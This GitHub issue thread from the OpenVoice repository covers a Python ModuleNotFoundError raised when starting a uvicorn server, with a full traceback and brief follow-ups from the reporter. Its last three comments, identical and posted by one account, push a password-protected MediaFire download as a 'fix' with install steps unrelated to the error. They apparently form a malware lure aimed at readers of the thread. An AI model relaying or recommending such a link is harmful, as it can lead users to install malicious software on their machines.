### ISSUE TITLE
No module named 'openvoice' attempting to start server

### ISSUE THREAD

**Issue by fury88** [myshell-ai/OpenVoice#302]
I must have missed a step, but I followed the instructions here and once I started up the server, I got this. Obviously, a script or package reference is in the wrong place. Whether it's me or the setup of the server itself I'm not sure.

`ubu@machine~/Projects/OpenVoice_server/openvoice$ uvicorn openvoice_server:app --host 0.0.0.0 --port 8000
Traceback (most recent call last):
  File "/home/ubu/.local/bin/uvicorn", line 8, in <module>
    sys.exit(main())
  File "/usr/lib/python3/dist-packages/click/core.py", line 1128, in __call__
    return self.main(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/click/core.py", line 1053, in main
    rv = self.invoke(ctx)
  File "/usr/lib/python3/dist-packages/click/core.py", line 1395, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/usr/lib/python3/dist-packages/click/core.py", line 754, in invoke
    return __callback(*args, **kwargs)
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/main.py", line 410, in main
    run(
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/main.py", line 577, in run
    server.run()
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/server.py", line 65, in run
    return asyncio.run(self.serve(sockets=sockets))
  File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/usr/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/server.py", line 69, in serve
    await self._serve(sockets)
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/server.py", line 76, in _serve
    config.load()
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/config.py", line 434, in load
    self.loaded_app = import_from_string(self.app)
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/importer.py", line 22, in import_from_string
    raise exc from None
  File "/home/ubu/.local/lib/python3.10/site-packages/uvicorn/importer.py", line 19, in import_from_string
    module = importlib.import_module(module_str)
  File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/home/ubu/Projects/OpenVoice_server/openvoice/openvoice_server.py", line 15, in <module>
    from api import ToneColorConverter
  File "/home/ubu/Projects/OpenVoice_server/openvoice/api.py", line 5, in <module>
    from openvoice import utils
ModuleNotFoundError: No module named 'openvoice'
`

**Comment by fury88** [comment]
@dosu Why must I use conda? I'd prefer not to.

**Comment by fury88** [comment]
@dosu I'll run with the official on linux here. Was trying not to install a ton of unneeded stuff but this is fine :-)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
